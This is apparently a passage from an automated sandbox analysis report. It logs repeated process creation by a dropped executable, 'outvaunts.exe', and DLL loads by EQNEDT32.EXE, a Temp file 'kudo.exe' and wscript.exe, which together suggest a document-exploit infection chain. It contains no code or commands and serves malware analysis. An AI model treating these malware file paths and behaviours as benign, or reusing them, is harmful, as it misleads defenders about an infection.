              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: unknown unknown
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: unknown unknown
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: credssp.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ncrypt.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: bcrypt.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: gpapi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: sfc_os.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: devrtl.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64win.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64cpu.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winnsi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: dwmapi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64win.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64cpu.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winnsi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: dwmapi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64win.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64cpu.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winnsi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: dwmapi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64win.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64cpu.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winnsi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: dwmapi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64win.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64cpu.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winnsi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: dwmapi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64win.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64cpu.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winnsi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: dwmapi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64win.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64cpu.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winnsi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: dwmapi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64win.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64cpu.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winnsi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: dwmapi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64win.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64cpu.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winnsi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: dwmapi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64win.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64cpu.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winnsi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: uxtheme.dll
